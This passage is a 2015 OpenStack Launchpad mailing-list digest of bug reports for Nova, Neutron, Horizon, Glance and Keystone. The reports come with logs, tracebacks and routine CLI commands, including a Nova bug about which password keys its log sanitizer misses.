tempest-TestVolumeBootPatternV2-966547300] CMD "sudo cinder-rootwrap 
/etc/cinder/rootwrap.conf env LC_ALL=C q
  emu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072"
 returned: 0 in 1.129s execute /usr/local/lib/python2.7/d
  ist-packages/oslo_concurrency/processutils.py:260
  2015-07-21 08:14:11.700 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] In delete_snapshot, volume status is 
in-use _delete_snapshot /opt
  /stack/cinder/cinder/volume/drivers/remotefs.py:956

  2) Nova log:
  2015-07-21 08:14:05.153 INFO nova.compute.manager 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] [instance: adbe1fa4-7136-4d29-91d
  0-5772dbf4900d] Terminating instance  
  2015-07-21 08:14

[Yahoo-eng-team] [Bug 1487003] [NEW] [VPNaaS] IPSec connection is stuck in 'Active' state even if connection isn't established

2015-08-20 Thread Elena Ezhova
Public bug reported:

VPN connection is stuck in 'Active' state even if connection is broken.

Steps to reproduce:
- create two networks with subnets, and two routers
- add gateways to the public subnet for both routers and add interfaces for the 
newly created nets (subnet1 for router1 and  subnet2 for router2)
- create VPN connections between the two networks
- spawn 2 vms, check that vpn connection works correctly
- remove 1 vpn connection

Expected result:
The second connection is in 'Down' state

Actual result:
The second connection is still 'Active', though it's incorrect

** Affects: neutron
 Importance: Undecided
 Assignee: Elena Ezhova (eezhova)
 Status: New


** Tags: vpnaas

** Changed in: neutron
 Assignee: (unassigned) => Elena Ezhova (eezhova)

** Tags added: vpnaas

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487003

Title:
  [VPNaaS] IPSec connection is stuck in 'Active' state even if
  connection isn't established

Status in neutron:
  New

Bug description:
  VPN connection is stuck in 'Active' state even if connection is
  broken.

  Steps to reproduce:
  - create two networks with subnets, and two routers
  - add gateways to the public subnet for both routers and add interfaces for 
the newly created nets (subnet1 for router1 and  subnet2 for router2)
  - create VPN connections between the two networks
  - spawn 2 vms, check that vpn connection works correctly
  - remove 1 vpn connection

  Expected result:
  The second connection is in 'Down' state

  Actual result:
  The second connection is still 'Active', though it's incorrect

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487003/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487005] [NEW] unable to modify 'Allocation Pools' after creating a subnet

2015-08-20 Thread Aharon Rasouli
Public bug reported:

Modifying subnet 'Allocation Pools' is impossible after creating via
Horizon GUI

>From nuetron CLI works:
neutron subnet-update ce373461-08a4-4974-95d0-75ebf328a62f --allocation-pool 
'start=192.168.1.10,end=192.168.1.254'


1.Create a network
2. create a subnet
3. check the disable gateway
4. edit the subnet: project --> newly created network --> click edit subnet in 
the relevant subnet
4. change the  'Allocation Pools' so it will start valid from 
192.168.1.2-192.168.1.254
5. click save
6. save message success - but in fact nothing has changed, the Allocation pools 
did not change

** Affects: horizon
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487005

Title:
  unable to modify 'Allocation Pools' after creating a subnet

Status in OpenStack Dashboard (Horizon):
  New

Bug description:
  Modifying subnet 'Allocation Pools' is impossible after creating via
  Horizon GUI

  From nuetron CLI works:
  neutron subnet-update ce373461-08a4-4974-95d0-75ebf328a62f --allocation-pool 
'start=192.168.1.10,end=192.168.1.254'


  1.Create a network
  2. create a subnet
  3. check the disable gateway
  4. edit the subnet: project --> newly created network --> click edit subnet 
in the relevant subnet
  4. change the  'Allocation Pools' so it will start valid from 
192.168.1.2-192.168.1.254
  5. click save
  6. save message success - but in fact nothing has changed, the Allocation 
pools did not change

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487005/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487025] [NEW] network-changed external_instance_event fails and traces hard if InstanceInfoCacheNotFound

2015-08-20 Thread Matt Riedemann
Public bug reported:

I saw this in a failed jenkins run with neutron:

http://logs.openstack.org/82/200382/6/check/gate-tempest-dsvm-neutron-
full/cd9bfaa/logs/screen-n-cpu.txt.gz?level=TRACE#_2015-08-20_12_36_06_873

2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher Traceback 
(most recent call last):
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
142, in _dispatch_and_reply
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
executor_callback))
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
186, in _dispatch
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
executor_callback)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
129, in _do_dispatch
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher result = 
func(ctxt, **new_args)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/exception.py", line 89, in wrapped
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher payload)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/exception.py", line 72, in wrapped
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher return 
f(self, context, *args, **kw)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/compute/manager.py", line 6310, in 
external_instance_event
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
self.network_api.get_instance_nw_info(context, instance)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/network/base_api.py", line 244, in 
get_instance_nw_info
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher result = 
self._get_instance_nw_info(context, instance, **kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/network/neutronv2/api.py", line 873, in 
_get_instance_nw_info
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
compute_utils.refresh_info_cache_for_instance(context, instance)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/compute/utils.py", line 356, in 
refresh_info_cache_for_instance
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
instance.info_cache.refresh()
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_versionedobjects/base.py", line 
195, in wrapper
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher ctxt, 
self, fn.__name__, args, kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/conductor/rpcapi.py", line 248, in object_action
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
objmethod=objmethod, args=args, kwargs=kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/client.py", line 
158, in call
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
retry=self.retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/transport.py", line 90, 
in _send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
timeout=timeout, retry=retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py", 
line 431, in send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
retry=retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py", 
line 422, in _send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher raise 
result
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
InstanceInfoCacheNotFound_Remote: Info cache for instance 
d9b950aa-be7c-40bd-93b4-d4d575ebdace could not be found.

Basically, the instance is deleted before the event is processed:

http://logs.openstack.org/82/200382/6/check/gate-tempest-dsvm-neutron-
full/cd9bfaa/logs/screen-n-cpu.txt.gz#_2015-08-20_12_36_06_097

http://logs.openstack.org/82/200382/6/check/gate-tem

[Yahoo-eng-team] [Bug 1487026] [NEW] When tasks fail importing with an error

2015-08-20 Thread Niall Bunting
Public bug reported:

If tasks fail importing an image for whatever reason, such as a 404. It
leaves the task in a 500 internal error state and the image in a saving
state.

This should be changed so the image is killed and a reasonable message
is replied to the task failure screen.

** Affects: glance
 Importance: Undecided
 Assignee: Niall Bunting (niall-bunting)
 Status: New

** Changed in: glance
 Assignee: (unassigned) => Niall Bunting (niall-bunting)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1487026

Title:
  When tasks fail importing with an error

Status in Glance:
  New

Bug description:
  If tasks fail importing an image for whatever reason, such as a 404.
  It leaves the task in a 500 internal error state and the image in a
  saving state.

  This should be changed so the image is killed and a reasonable message
  is replied to the task failure screen.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1487026/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487038] [NEW] nova.exception._cleanse_dict should use oslo_utils.strutils._SANITIZE_KEYS

2015-08-20 Thread Matt Riedemann
Public bug reported:

The wrap_exception decorator in nova.exception uses the _cleanse_dict
helper method to remove any keys from the args/kwargs list of the method
that was called, but only checks those keys of the form *_pass:

http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

def _cleanse_dict(original):
"""Strip all admin_password, new_pass, rescue_pass keys from a dict."""
return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

The oslo_utils.strutils module has it's own list of keys to sanitized
used in it's mask_password method:

http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

_SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
  'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
  'sys_pswd']

The nova code should probably be using some form of the same thing that
strutils is using for mask_password, which uses a regex to find hits.
For example, if the arg was 'auth_token' or simply 'password',
_cleanse_dict would fail to filter it out.

You could also argue that the oslo.messaging log notifier should be
using oslo_utils.strutils.mask_password before it logs the message -
which isn't happening in that library today.

** Affects: nova
 Importance: Low
 Status: Confirmed

** Changed in: nova
   Status: New => Confirmed

** Changed in: nova
   Importance: Undecided => Low

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487038

Title:
  nova.exception._cleanse_dict should use
  oslo_utils.strutils._SANITIZE_KEYS

Status in OpenStack Compute (nova):
  Confirmed

Bug description:
  The wrap_exception decorator in nova.exception uses the _cleanse_dict
  helper method to remove any keys from the args/kwargs list of the
  method that was called, but only checks those keys of the form *_pass:

  
http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

  def _cleanse_dict(original):
  """Strip all admin_password, new_pass, rescue_pass keys from a dict."""
  return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

  The oslo_utils.strutils module has it's own list of keys to sanitized
  used in it's mask_password method:

  
http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

  _SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
'sys_pswd']

  The nova code should probably be using some form of the same thing
  that strutils is using for mask_password, which uses a regex to find
  hits.  For example, if the arg was 'auth_token' or simply 'password',
  _cleanse_dict would fail to filter it out.

  You could also argue that the oslo.messaging log notifier should be
  using oslo_utils.strutils.mask_password before it logs the message -
  which isn't happening in that library today.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487038/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1427098] Re: Container servers are wrongly scheduled to non-docker hypervisor

2015-08-20 Thread John Garbutt
docker is not in the nova tree any more, so this is no longer in scope
for nova.

** Changed in: nova
   Status: New => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1427098

Title:
  Container servers are wrongly scheduled to non-docker hypervisor

Status in OpenStack Compute (nova):
  Won't Fix

Bug description:
  In an environment with more than one hypervisor type including QEMU and
  docker, when creating a container server, the request can be wrongly
  scheduled to a QEMU hypervisor.

  I test it in Juno and there is the same bug in Kilo.

  For example,  there is two compute node, one hypervisor is docker
  (node A-172), anther one hypervisor is QEMU(node B-168).

  I can create a docker server which uses docker image "tutum/wordpress" in a 
QEMU node(node B-168).
  In this case it ignores the parameter “image" whether is match the hypervisor 
type, finally this server
  boot failed with "no bootable device".

  I'm not sure is there any other parameter for QEMU,  docker and Xen
  hypervisor should check.

  My step is following:

  [root@ ~(keystone_admin)]# glance image-show tutum/wordpress
  +--+--+
  | Property | Value|
  +--+--+
  | checksum | bab44a59a74878dd953c4ae5242f7c7c |
  | container_format | docker   |
  | created_at   | 2015-02-02T07:00:47  |
  | deleted  | False|
  | disk_format  | raw  |
  | id   | b8e12702-3fd1-4847-b018-ac8ba6edead7 |
  | is_public| True |
  | min_disk | 0|
  | min_ram  | 0|
  | name | tutum/wordpress  |
  | owner| 09291698b9ff44728493252e67fc6ee5 |
  | protected| False|
  | size | 517639680|
  | status   | active   |
  | updated_at   | 2015-02-02T07:02:15  |
  +--+--+

  [root@ ~(keystone_admin)]# nova boot --flavor 2 --image
  tutum/wordpress --key-name key1 --nic net-
  id=2510a249-1665-4184-afc8-62a2eccf6c3b --availability-zone xxx:B-168
  test-image-168

  2015-03-02 01:55:12.239 2857 WARNING nova.virt.disk.vfs.guestfs [-] Failed to 
close augeas aug_close: do_aug_close: y
  ou must call 'aug-init' first to initialize Augeas
  2015-03-02 01:55:12.274 2857 DEBUG nova.virt.disk.api [-] Unable to mount 
image /var/lib/nova/instances/e799cc70-2e9f
  -44da-9ebd-0f55ddc7cd13/disk with error Error mounting 
/var/lib/nova/instances/e799cc70-2e9f-44da-9ebd-0f55ddc7cd13/d
  isk with libguestfs (mount_options: /dev/sda on / (options: ''): mount: 
/dev/sda is write-protected, mounting read-on
  ly
  mount: unknown filesystem type '(null)'). Cannot resize. 
is_image_partitionless /usr/lib/python2.7/site-packages/nova
  /virt/disk/api.py:218

  2015-03-02 01:55:12.276 2857 DEBUG nova.virt.libvirt.driver [-] [instance: 
e799cc70-2e9f-44da-9ebd-0f55ddc7cd13] Star
  t _get_guest_xml network_info=[VIF({'profile': {}, 'ovs_interfaceid': 
u'563e9d58-9d41-4700-b4f2-a56a6ecfcefe', 'netwo
  rk': Network({'bridge': 'br-int', 'subnets': [Subnet({'ips': 
[FixedIP({'meta': {}, 'version': 4, 'type': 'fixed', 'fl
  oating_ips': [], 'address': u'10.0.0.45'})], 'version': 4, 'meta': 
{'dhcp_server': u'10.0.0.3'}, 'dns': [], 'routes':
   [], 'cidr': u'10.0.0.0/24', 'gateway': IP({'meta': {}, 'version': 4, 'type': 
'gateway', 'address': u'10.0.0.1'})})],
   'meta': {'injected': False, 'tenant_id': 
u'3cf2410b5f554653a93796982657984b'}, 'id': u'2510a249-1665-4184-afc8-62a2e
  ccf6c3b', 'label': u'private'}), 'devname': u'tap563e9d58-9d', 'vnic_type': 
u'normal', 'qbh_params': None, 'meta': {}
  , 'details': {u'port_filter': True, u'ovs_hybrid_plug': True}, 'address': 
u'fa:16:3e:d9:b3:1f', 'active': False, 'typ
  e': u'ovs', 'id': u'563e9d58-9d41-4700-b4f2-a56a6ecfcefe', 'qbg_params': 
None})] disk_info={'disk_bus': 'virtio', 'cd
  rom_bus': 'ide', 'mapping': {'disk': {'bus': 'virtio', 'boot_index': '1', 
'type': 'disk', 'dev': u'vda'}, 'root': {'b
  us': 'virtio', 'boot_index': '1', 'type': 'disk', 'dev': u'vda'}}} 
image_meta={u'status': u'active', u'deleted': Fals
  e, u'container_format': u'docker', u'min_ram': 0, u'updated_at': 
u'2015-02-02T07:02:15.00', u'min_disk': 0, u'own
  er': u'09291698b9ff44728493252e67fc6ee5', u'is_public': True, u'deleted_at': 
None, u'properties': {}, u'size': 517639
  680, u'name': u'tutum/wordpress', u'checksum': 
u'bab44a59a74878dd953c4ae5242f7c7c', u'created_at': u'201

[Yahoo-eng-team] [Bug 1487048] [NEW] logic error in metadata_to_dict utility function

2015-08-20 Thread Brian Rosmaita
Public bug reported:

Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
filter_deleted flag into the metadata_to_dict function.  The way this
flag is used at
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
however, has the effect that when filter_deleted is true, all instance
system metadata will be returned in the dict even if such metadata is
deleted, contrary to the purpose of the flag.

** Affects: nova
 Importance: Undecided
 Assignee: Brian Rosmaita (brian-rosmaita)
 Status: New

** Changed in: nova
 Assignee: (unassigned) => Brian Rosmaita (brian-rosmaita)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487048

Title:
  logic error in metadata_to_dict utility function

Status in OpenStack Compute (nova):
  New

Bug description:
  Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
  filter_deleted flag into the metadata_to_dict function.  The way this
  flag is used at
  
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
  however, has the effect that when filter_deleted is true, all instance
  system metadata will be returned in the dict even if such metadata is
  deleted, contrary to the purpose of the flag.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487048/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487053] [NEW] validate_local_ip shouldn't run if no tunneling is enabled

2015-08-20 Thread John Schwarz
Public bug reported:

In case no tunnel_types were specified in the ml2 configuration, the
configuration option local_ip is ignored in the code. However,
validate_local_ip always check if local_ip is being used by an actual
interface, even though it shouldn't if tunnel_types is empty.

** Affects: neutron
 Importance: Undecided
 Assignee: John Schwarz (jschwarz)
 Status: In Progress

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487053

Title:
  validate_local_ip shouldn't run if no tunneling is enabled

Status in neutron:
  In Progress

Bug description:
  In case no tunnel_types were specified in the ml2 configuration, the
  configuration option local_ip is ignored in the code. However,
  validate_local_ip always check if local_ip is being used by an actual
  interface, even though it shouldn't if tunnel_types is empty.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487053/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487070] [NEW] Only CPU compute monitors are loaded by compute.monitors extension loader

2015-08-20 Thread Jay Pipes
Public bug reported:

There is a TODO in the extension loader for compute monitors:

# TODO(jaypipes): Right now, we only have CPU monitors, so we don't
# need to check if the plugin is a CPU monitor or not. Once non-CPU
# monitors are added, change this to check either the base class or
# the set of metric names returned to ensure only a single CPU
# monitor is loaded at any one time.

We need a mechanism to load other types of compute monitors than CPU.

** Affects: nova
 Importance: Low
 Assignee: Jay Pipes (jaypipes)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487070

Title:
  Only CPU compute monitors are loaded by compute.monitors extension
  loader

Status in OpenStack Compute (nova):
  In Progress

Bug description:
  There is a TODO in the extension loader for compute monitors:

  # TODO(jaypipes): Right now, we only have CPU monitors, so we don't
  # need to check if the plugin is a CPU monitor or not. Once non-CPU
  # monitors are added, change this to check either the base class or
  # the set of metric names returned to ensure only a single CPU
  # monitor is loaded at any one time.

  We need a mechanism to load other types of compute monitors than CPU.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487070/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487086] [NEW] Pagination doesn't work with v2 API image-list

2015-08-20 Thread Kairat Kushaev
Public bug reported:

It seems that glance client doesn't have pagination for image-list correctly 
implemented:
1) glance client v2 doesn't have marker parameter defined
2) glance client ignores page-size parameter when specifying image-list.
glance image-list --page-size 1 returns all images.

** Affects: glance
 Importance: Undecided
 Assignee: Kairat Kushaev (kkushaev)
 Status: New

** Changed in: glance
 Assignee: (unassigned) => Kairat Kushaev (kkushaev)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1487086

Title:
  Pagination doesn't work with v2 API image-list

Status in Glance:
  New

Bug description:
  It seems that glance client doesn't have pagination for image-list correctly 
implemented:
  1) glance client v2 doesn't have marker parameter defined
  2) glance client ignores page-size parameter when specifying image-list.
  glance image-list --page-size 1 returns all images.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1487086/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1352510] Re: Delete and re-add of same node to compute_nodes table is broken

2015-08-20 Thread Jim Rollenhagen
15:15:57 edleafe | jroll: ok, got to look at that bug, and yeah,
it should have closed it, but I forgot to put Closes-bug: in the commit
message

And I agree it appears to fix it.

This was released with Liberty-1

** Changed in: nova
   Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1352510

Title:
  Delete and re-add of same node to compute_nodes table is broken

Status in OpenStack Compute (nova):
  Fix Released

Bug description:
  When a compute node is deleted (or marked deleted) in the DB and
  another compute node is re-added with the same name, things break.

  This is because the resource tracker caches the compute node
  object/dict and uses the 'id' to update the record. When this happens,
  rt.update_available_resources will raise a ComputeHostNotFound. This
  ends up short-circuiting the full run of the
  update_available_resource() periodic task.

  This mostly applies when using a virt driver where a nova-compute
  manages more than 1 "hypervisor".

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1352510/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487109] [NEW] No minimum test coverage for JavaScript

2015-08-20 Thread Rob Cresswell
Public bug reported:

JavaScript code in Horizon currently has no minimum test coverage, and
this should be amended.

** Affects: horizon
 Importance: Wishlist
 Assignee: Rob Cresswell (robcresswell)
 Status: In Progress

** Changed in: horizon
Milestone: None => liberty-3

** Changed in: horizon
   Importance: Undecided => Wishlist

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487109

Title:
  No minimum test coverage for JavaScript

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  JavaScript code in Horizon currently has no minimum test coverage, and
  this should be amended.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487109/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487115] [NEW] Ephemeral user's id is not always urlsafe

2015-08-20 Thread Marek Denis
Public bug reported:

Ephemeral users' id should always be url-safe. Sadly, id the mapping
rule specifies user's id the value will be passed as-is and never url-
encoded. We should change auth.plugins.mapped.setup_username() function
and make sure user_id is always treated with
six.moves.urllib.parse.quote()  function.

** Affects: keystone
 Importance: Medium
 Assignee: Marek Denis (marek-denis)
 Status: In Progress


** Tags: federation

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1487115

Title:
  Ephemeral user's id is not always urlsafe

Status in Keystone:
  In Progress

Bug description:
  Ephemeral users' id should always be url-safe. Sadly, id the mapping
  rule specifies user's id the value will be passed as-is and never url-
  encoded. We should change auth.plugins.mapped.setup_username()
  function and make sure user_id is always treated with
  six.moves.urllib.parse.quote()  function.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1487115/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Steve Martinelli
Looks like OSC  and KSC  already had the code to do this, so I'm marking
it as invalid for those projects

osc: 
https://github.com/openstack/python-openstackclient/blob/master/openstackclient/identity/v3/endpoint.py#L143-L147
ksc: 
https://github.com/openstack/python-keystoneclient/blob/master/keystoneclient/v3/endpoints.py#L70-L83

** Changed in: python-keystoneclient
   Status: New => Invalid

** Changed in: python-openstackclient
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Invalid
Status in python-openstackclient:
  Invalid

Bug description:
  When i run “openstack endpoint list --os-url http://192.168.33.10:5000/v3 
--os-identity-api-version=3 --service identity --interface public --region 
RegionTwo” i would expect that it only lists endpoints from RegionTwo. But i 
get the identity endpoint from RegionOne. Here is the output:
  
+--+---+--+--+-+---++
  | ID   | Region| Service Name | Service Type 
| Enabled | Interface | URL|
  
+--+---+--+--+-+---++
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone | identity 
| True| public| http://192.168.33.10:5000/v2.0 |
  
+--+---+--+--+-+---++

  As this snippet from the debug output from openstackclient shows, the
  client sends the correct query to keystone. So i assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET 
/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo
 HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary: 
X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu) 
connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type: 
application/json x-openstack-request-id: 
req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self": 
"http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"}, 
"url": "http://192.168.33.10:5000/v2.0";, "region": "RegionOne", "enabled": 
true, "interface": "public", "service_id": "050872861656437184778a822032d8d6", 
"id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self": 
